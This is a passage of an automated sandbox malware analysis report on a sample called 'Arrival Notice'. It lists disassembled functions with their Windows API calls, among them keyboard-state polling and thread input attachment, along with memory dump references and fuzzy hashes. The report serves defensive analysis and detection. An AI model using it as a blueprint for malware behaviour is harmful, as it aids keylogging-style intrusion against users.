                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
                  • String ID:
                  • API String ID: 429561992-0
                  • Opcode ID: 8aeba083ef172a7940976ea4f2579d3eacc4ed4aa959e51a15b2648f875b6b57
                  • Instruction ID: 1d3108ec0f5d7f09bffe5cdb0f58589b85e29dfa7e93e71cc16c4ff3105120c1
                  • Opcode Fuzzy Hash: 8aeba083ef172a7940976ea4f2579d3eacc4ed4aa959e51a15b2648f875b6b57
                  • Instruction Fuzzy Hash: C7C176716083019FD700DF68C88496BBBE9FF89749F04591EF98A9B250DB34EE06CB56
                  Function 00427A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32(00000000), ref: 00427AF3
                  • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00427B8F
                  • SHGetDesktopFolder.SHELL32(?), ref: 00427BA3
                  • CoCreateInstance.OLE32(0044FD08,00000000,00000001,00476E6C,?), ref: 00427BEF
                  • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00427C74
                  • CoTaskMemFree.OLE32(?,?), ref: 00427CCC
                  • SHBrowseForFolderW.SHELL32(?), ref: 00427D57
                  • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00427D7A
                  • CoTaskMemFree.OLE32(00000000), ref: 00427D81
                  • CoTaskMemFree.OLE32(00000000), ref: 00427DD6
                  • CoUninitialize.OLE32 ref: 00427DDC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                  • String ID:
                  • API String ID: 2762341140-0
                  • Opcode ID: 53506237fe4a9ba34b7605bdc7431e0a00dc6ddd298f8297821d1eaf1c00e94a
                  • Instruction ID: d3f6c62d7eadd0d84829f9ec05aa832e624c21077c0466f48ff0e757c3423a61
                  • Opcode Fuzzy Hash: 53506237fe4a9ba34b7605bdc7431e0a00dc6ddd298f8297821d1eaf1c00e94a
                  • Instruction Fuzzy Hash: 0CC15C75A00119AFCB14DFA4D884DAEBBF9FF48304B1484A9E91ADB361DB34ED41CB94
                  Function 0044541D Relevance: 16.7, APIs: 11, Instructions: 191windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00445504
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00445515
                  • CharNextW.USER32(00000158), ref: 00445544
                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00445585
                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0044559B
                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004455AC
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$CharNext
                  • String ID:
                  • API String ID: 1350042424-0
                  • Opcode ID: 48a6d529aaf9e97b68dd0e7db931d7401a2953f2cc6888fbc0c549de42ea5b99
                  • Instruction ID: 1c3df5485b32a8d0c752c238e4b1c28e0a30032f0fe7246462d870cd95f1900c
                  • Opcode Fuzzy Hash: 48a6d529aaf9e97b68dd0e7db931d7401a2953f2cc6888fbc0c549de42ea5b99
                  • Instruction Fuzzy Hash: EC61C374904608FFEF10DF50CC85AFF7B79EB06321F148156F9259A292D7388A81DB69
                  Function 0040FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON
                  Download Yara Rule
                  APIs
                  • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0040FAAF
                  • SafeArrayAllocData.OLEAUT32(?), ref: 0040FB08
                  • VariantInit.OLEAUT32(?), ref: 0040FB1A
                  • SafeArrayAccessData.OLEAUT32(?,?), ref: 0040FB3A
                  • VariantCopy.OLEAUT32(?,?), ref: 0040FB8D
                  • SafeArrayUnaccessData.OLEAUT32(?), ref: 0040FBA1
                  • VariantClear.OLEAUT32(?), ref: 0040FBB6
                  • SafeArrayDestroyData.OLEAUT32(?), ref: 0040FBC3
                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0040FBCC
                  • VariantClear.OLEAUT32(?), ref: 0040FBDE
                  • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0040FBE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                  • String ID:
                  • API String ID: 2706829360-0
                  • Opcode ID: c6a668d7eb74c53c5c069f0236d4aaa9f81934d28ffba69db0279a66f0fb0330
                  • Instruction ID: 0073d956df7e97986c7c6133f45798ddcb751f055671d0da304bc10acb8632b3
                  • Opcode Fuzzy Hash: c6a668d7eb74c53c5c069f0236d4aaa9f81934d28ffba69db0279a66f0fb0330
                  • Instruction Fuzzy Hash: B7415F35A00219DFCB10DF64C8949AEBBB9EF48354F04807AE905AB661DB34E945CFA4
                  Function 00419C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                  Download Yara Rule
                  APIs
                  • GetKeyboardState.USER32(?), ref: 00419CA1
                  • GetAsyncKeyState.USER32(000000A0), ref: 00419D22
                  • GetKeyState.USER32(000000A0), ref: 00419D3D
                  • GetAsyncKeyState.USER32(000000A1), ref: 00419D57
                  • GetKeyState.USER32(000000A1), ref: 00419D6C
                  • GetAsyncKeyState.USER32(00000011), ref: 00419D84
                  • GetKeyState.USER32(00000011), ref: 00419D96
                  • GetAsyncKeyState.USER32(00000012), ref: 00419DAE
                  • GetKeyState.USER32(00000012), ref: 00419DC0
                  • GetAsyncKeyState.USER32(0000005B), ref: 00419DD8
                  • GetKeyState.USER32(0000005B), ref: 00419DEA
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: State$Async$Keyboard
                  • String ID:
                  • API String ID: 541375521-0
                  • Opcode ID: dc37072713cdb1c2f65c66e57245c64b1f86045776b798eacc8fcfeb9e5162fa
                  • Instruction ID: 4226504df177ad6139a8e279257ec48594c60c8ef0f01d7613870239e9324c8a
                  • Opcode Fuzzy Hash: dc37072713cdb1c2f65c66e57245c64b1f86045776b798eacc8fcfeb9e5162fa
                  • Instruction Fuzzy Hash: DF41C7346047C969FF708764D4643E7BEA06B12344F08805BDAC6567C2E7A89DC4C7AA
                  Function 0043055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                  Download Yara Rule
                  APIs
                  • WSAStartup.WSOCK32(00000101,?), ref: 004305BC
                  • inet_addr.WSOCK32(?), ref: 0043061C
                  • gethostbyname.WSOCK32(?), ref: 00430628
                  • IcmpCreateFile.IPHLPAPI ref: 00430636
                  • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 004306C6
                  • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 004306E5
                  • IcmpCloseHandle.IPHLPAPI(?), ref: 004307B9
                  • WSACleanup.WSOCK32 ref: 004307BF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                  • String ID: Ping
                  • API String ID: 1028309954-2246546115
                  • Opcode ID: 7b577dd8cc24a1a6dccbaa307d996dac7f947da987d1dccb5c1ce46c57d8319f
                  • Instruction ID: 55998162bfcc128f6a6532be9b9bfb48fc62e22234df4cec31ff412b0eb4920b
                  • Opcode Fuzzy Hash: 7b577dd8cc24a1a6dccbaa307d996dac7f947da987d1dccb5c1ce46c57d8319f
                  • Instruction Fuzzy Hash: 3A91A0356042019FD320DF15C499F1ABBE0AF49318F1496AAF46A8F7A2C734EC41CF95
                  Function 00438CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharLower
                  • String ID: cdecl$none$stdcall$winapi
                  • API String ID: 707087890-567219261
                  • Opcode ID: b76c735d49d3d90593eaf11f3da591e89a63ea5f9e4525ea7d78b53b24980b0d
                  • Instruction ID: 994ffe9782198988268945e5e70b2a559d0bf4a0c8b68762b3d899daf722fc3d
                  • Opcode Fuzzy Hash: b76c735d49d3d90593eaf11f3da591e89a63ea5f9e4525ea7d78b53b24980b0d
                  • Instruction Fuzzy Hash: 6C51A032A006169BCF14DF68C9519BEB7A5BF68724B20522EF526EB3C4DB38DD40C794
                  Function 0043372C Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                  Download Yara Rule
                  APIs
                  • CoInitialize.OLE32 ref: 00433774
                  • CoUninitialize.OLE32 ref: 0043377F
                  • CoCreateInstance.OLE32(?,00000000,00000017,0044FB78,?), ref: 004337D9
                  • IIDFromString.OLE32(?,?), ref: 0043384C
                  • VariantInit.OLEAUT32(?), ref: 004338E4
                  • VariantClear.OLEAUT32(?), ref: 00433936
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                  • API String ID: 636576611-1287834457
                  • Opcode ID: 503891283aa05e70046ddb68bf1ba5082556ae9f7ccd53f8a87ac1a3b962cb82
                  • Instruction ID: 76286bdb1c1191e2c0a9d3461048596ca8d6b231c37d6793c1d3c149c5d9d93b
                  • Opcode Fuzzy Hash: 503891283aa05e70046ddb68bf1ba5082556ae9f7ccd53f8a87ac1a3b962cb82
                  • Instruction Fuzzy Hash: 0961AE70608301AFD311EF54C889B9AB7E4EF49716F10481EF5859B291C778EE49CB9A
                  Function 00423388 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 149COMMON
                  Download Yara Rule
                  APIs
                  • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 004233CF
                    • Part of subcall function 003B9CB3: _wcslen.LIBCMT ref: 003B9CBD
                  • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 004233F0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: LoadString$_wcslen
                  • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                  • API String ID: 4099089115-3080491070
                  • Opcode ID: 37acb9dc7dc7bc28540f9a7c114b3495ecbb89ed450445fb9b8aa0ae3a6f79d9
                  • Instruction ID: 235c06bf9e77116dbcb9e7df3f221de5b18cd4299edcb2a3acca09404014a4ad
                  • Opcode Fuzzy Hash: 37acb9dc7dc7bc28540f9a7c114b3495ecbb89ed450445fb9b8aa0ae3a6f79d9
                  • Instruction Fuzzy Hash: EB51D331900219BADF16EBE0DD42EEEB779AF04304F644066F60976062DB392F98DF64
                  Function 0041B5C8 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 142COMMON
                  Download Yara Rule
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _wcslen$BuffCharUpper
                  • String ID: APPEND$EXISTS$KEYS$REMOVE
                  • API String ID: 1256254125-769500911
                  • Opcode ID: ffb6bcada9790df47c367a139839d3c9f9138a31c105accd5a45562945e1d95e
                  • Instruction ID: 6454220dfc89ac1a5cad4dfb8b4a1ed285da89fbaeaabb156b5326ba8f16c6ac
                  • Opcode Fuzzy Hash: ffb6bcada9790df47c367a139839d3c9f9138a31c105accd5a45562945e1d95e
                  • Instruction Fuzzy Hash: C041D232A001269ACB206F7D89A05FF77A5EBB0794B25412BE465DB380E739CDC1C7D5
                  Function 00425393 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 103COMMON
                  Download Yara Rule
                  APIs
                  • SetErrorMode.KERNEL32(00000001), ref: 004253A0
                  • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00425416
                  • GetLastError.KERNEL32 ref: 00425420
                  • SetErrorMode.KERNEL32(00000000,READY), ref: 004254A7
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Error$Mode$DiskFreeLastSpace
                  • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                  • API String ID: 4194297153-14809454
                  • Opcode ID: b8d112206cd8da3aca672859aae510b611ce0228074daaa3d8780a1058b177c2
                  • Instruction ID: d01d153ee2302610ee574fbf71092a03aaf93e2e631f9f5ea8f987a3ef402bfe
                  • Opcode Fuzzy Hash: b8d112206cd8da3aca672859aae510b611ce0228074daaa3d8780a1058b177c2
                  • Instruction Fuzzy Hash: E931DF35B005149FC710EF68E484BEABBB4EB05309F58806BE505CB392DB38DD82CB95
                  Function 00443C46 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                  Download Yara Rule
                  APIs
                  • CreateMenu.USER32 ref: 00443C79
                  • SetMenu.USER32(?,00000000), ref: 00443C88
                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00443D10
                  • IsMenu.USER32(?), ref: 00443D24
                  • CreatePopupMenu.USER32 ref: 00443D2E
                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00443D5B
                  • DrawMenuBar.USER32 ref: 00443D63
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                  • String ID: 0$F
                  • API String ID: 161812096-3044882817
                  • Opcode ID: 8c5139049da21650be947b7cf166b220693d0ce79f2342d07cf6d0b0f84a5a06
                  • Instruction ID: 77cfa599ccc97d54f49c518668a7c6c9a16c3d7a39676181483ba1419597a6ab
                  • Opcode Fuzzy Hash: 8c5139049da21650be947b7cf166b220693d0ce79f2342d07cf6d0b0f84a5a06
                  • Instruction Fuzzy Hash: 1D415CB9A01209EFEB14CF64D884AEE7BB5FF49751F14002AF95697360D734AA10CF98
                  Function 00443A23 Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                  Download Yara Rule
                  APIs
                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00443A9D
                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00443AA0
                  • GetWindowLongW.USER32(?,000000F0), ref: 00443AC7
                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00443AEA
                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00443B62
                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00443BAC
                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00443BC7
                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00443BE2
                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00443BF6
                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00443C13
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: MessageSend$LongWindow
                  • String ID:
                  • API String ID: 312131281-0
                  • Opcode ID: 5c6c2e2770a25d1bf7664d482f7b091de5ccd1cdeb573089ba6aec7aa1af22f7
                  • Instruction ID: 3de66e524376c695438676e42590d8bd0e07af31fa82ba3bf8e3a806419c1b20
                  • Opcode Fuzzy Hash: 5c6c2e2770a25d1bf7664d482f7b091de5ccd1cdeb573089ba6aec7aa1af22f7
                  • Instruction Fuzzy Hash: CE616D75900248AFEB10DF64CC81EEE77B8EB09704F10419AFA15A73A1C774AE46DF54
                  Function 0041B12F Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                  Download Yara Rule
                  APIs
                  • GetCurrentThreadId.KERNEL32 ref: 0041B151
                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B165
                  • GetWindowThreadProcessId.USER32(00000000), ref: 0041B16C
                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B17B
                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 0041B18D
                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B1A6
                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B1B8
                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B1FD
                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B212
                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0041A1E1,?,00000001), ref: 0041B21D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                  • String ID:
                  • API String ID: 2156557900-0
                  • Opcode ID: 98aceb2023e2b03280c4016b28741d3a645369e2ee7da7509560b5b45b94a91f
                  • Instruction ID: ee35be9c631e8ded748611bde930762140f6dd5543dacac29b77e71249557dd2
                  • Opcode Fuzzy Hash: 98aceb2023e2b03280c4016b28741d3a645369e2ee7da7509560b5b45b94a91f
                  • Instruction Fuzzy Hash: 5731F775140204BFDB10AF64DC98FAE7B69FB12756F15842AF900C6350C7789D808FAC
                  Function 003E2C80 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                  Download Yara Rule
                  APIs
                  • _free.LIBCMT ref: 003E2C94
                    • Part of subcall function 003E29C8: RtlFreeHeap.NTDLL(00000000,00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000), ref: 003E29DE
                    • Part of subcall function 003E29C8: GetLastError.KERNEL32(00000000,?,003ED7D1,00000000,00000000,00000000,00000000,?,003ED7F8,00000000,00000007,00000000,?,003EDBF5,00000000,00000000), ref: 003E29F0
                  • _free.LIBCMT ref: 003E2CA0
                  • _free.LIBCMT ref: 003E2CAB
                  • _free.LIBCMT ref: 003E2CB6
                  • _free.LIBCMT ref: 003E2CC1
                  • _free.LIBCMT ref: 003E2CCC
                  • _free.LIBCMT ref: 003E2CD7
                  • _free.LIBCMT ref: 003E2CE2
                  • _free.LIBCMT ref: 003E2CED
                  • _free.LIBCMT ref: 003E2CFB
                  Memory Dump Source
                  • Source File: 00000000.00000002.1659920401.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                  • Associated: 00000000.00000002.1659906452.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659965256.0000000000472000.00000002.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1659999268.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.1660012374.0000000000484000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_3b0000_Arrival Notice.jbxd
                  Similarity
                  • API ID: _free$ErrorFreeHeapLast
                  • String ID:
                  • API String ID: 776569668-0
                  • Opcode ID: 9a23871e58a0950978b7bb969e586b823647ee7ddf109d6eb8286d812fc9e378
                  • Instruction ID: 4e54f6e178d637ff9891cbc39880c9992fd088c9b31243c7234b778e08da4cec
